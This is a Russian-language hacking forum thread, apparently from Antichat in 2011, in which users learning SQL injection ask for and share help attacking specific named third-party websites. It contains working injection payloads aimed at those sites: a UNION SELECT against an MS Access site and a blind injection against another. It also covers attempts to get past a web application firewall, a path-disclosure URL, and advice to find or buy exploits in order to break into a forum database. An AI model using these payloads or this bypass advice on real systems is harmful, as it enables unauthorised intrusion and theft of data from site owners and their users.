 |
|
21.09.2011, 22:25
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Только учу sql injection.
Нашел сайт, вбил в поиск - 123' выдало
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'' IN BOOLEAN MODE)' at line 1
смущает IN BOOLEAN MODE (да...sql надо подучить) принцип тот же самый? |
|
|
21.09.2011, 22:35
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от wkar
Подскажите, как крутить MS Access http://www.kzr.spb.ru/news-temp.asp?id=-1' ?
http://www.kzr.spb.ru/news-temp.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+msysac cessobjects
|
|
|
|
22.09.2011, 10:32
|
|
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами:
7723766
Репутация:
1
|
|
Сообщение от Tigger
Как варианты попробуй:
Да, это waf. Блокирует слово union "as such", под любым соусом в GET. Ищу возможность его как-то разбить на части, но похоже это невозможно.
Вот что можно:
Код:
like
concat
group_concat
version
id=(1)
symbols: # -- /**/ ()
А это нельзя:
Код:
union
select
update
insert
symbols: ; ,
|
|
|
|
22.09.2011, 16:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
попробуй post'ом
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
22.09.2011, 17:11
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Форум IPB 3.2.0,нашел раскрытие пути
Код:
Warning: Illegal offset type in /var/admin/setup/sources/classes/output/output.php on line 248
По такому адресу:
Код:
_http://insider.net.kg/admin/upgrade/index.php?app=upgrade&s=§ion[]=index&do=login
Как можно юзать уязвимость? Можно ли провести как то sql иньекцию? Очень нужно пролезть в бд)
Заранее спс,за совет. |
|
|
|
22.09.2011, 21:03
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от alerondel
Форум IPB 3.2.0,нашел раскрытие пути
Код:
Warning: Illegal offset type in /var/admin/setup/sources/classes/output/output.php on line 248
По такому адресу:
Код:
_http://insider.net.kg/admin/upgrade/index.php?app=upgrade&s=§ion[]=index&do=login
Как можно юзать уязвимость? Можно ли провести как то sql иньекцию? Очень нужно пролезть в бд)
Заранее спс,за совет. ну нахсел раскрытие..и что дальше? это не относится к багам которые дают доступ к БД..ищи сплоиты под эту версию форума..или баги приват покупай
|
|
|
|
23.09.2011, 02:53
|
|
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами:
7723766
Репутация:
1
|
|
Сообщение от shell_c0de
попробуй post'ом
Пробовал, даже куками, кажется.
Пробовал HPP (или HPF, я пока еще не разбираюсь ). В таком виде: id=5 and 1=0 un&id=ion итд, может, конечно, не так составил, но не заработало.
Хорошо забаррикадировались, собаки. На самом деле, насколько я могу судить, хороший, годный waf. Он анализирует строчку REQUEST_URI, я так подозреваю, потому что &asd=union вываливает ошибку тоже.
|
|
|
|
23.09.2011, 16:38
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?
|
|
|
|
23.09.2011, 17:21
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от wkar
Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?
Только blind.
http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)
|
|
|
|
23.09.2011, 17:23
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от wkar
Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?
Если белая страница, или вырубает на главную, значит запрос неверный, что тут непонятного??
Сообщение от er9j6@
Только blind.
http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)
Поля подобрать можно их 14
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
